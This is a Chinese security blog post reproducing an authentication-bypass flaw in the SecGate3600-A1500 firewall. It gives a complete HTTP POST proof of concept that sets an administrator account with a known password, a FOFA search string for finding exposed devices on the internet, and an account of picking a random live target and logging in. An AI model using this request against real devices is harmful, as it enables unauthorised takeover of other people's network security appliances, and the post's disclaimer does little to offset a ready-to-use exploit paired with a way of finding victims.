网神 SecGate3600-A1500权限绕过漏洞复现

文摘   科技   2024-08-08 09:00   陕西  

免责声明

     请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。



01
0x01漏洞描述
网神SecGate3600-A1500会话鉴权逻辑存在问题导致,登录绕过获取管理员权限。

02
0x02 漏洞复现 
POC如下所示:
POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1Host: xx.xx..xx{{int(1-10)}}Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept: application/xml, text/xml, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept-Language: zh-CN,zh;q=0.9Content-Length: 26
type=saveAdmin&id=2&userName=audit&pwd=audit@1234&net=0.0.0.0&mask=0.0.0.0&port=ANY&allow=Y


03
0x03 过程截图
fofa: "sec_gate_image/button_normal.gif"

随机找一个,页面如下:


使用poc执行id命令:

然后使用账号密码进行登录:userName=auditpwd=audit@1234

登录成功:

END
点击蓝字  关注我们

爱喝酒烫头的曹操
主要分享一些漏洞挖掘小技巧,代码审计、web安全、内网渗透以及一些实战案例、快速获得edu及cnvd漏洞报送证书小技巧。
 最新文章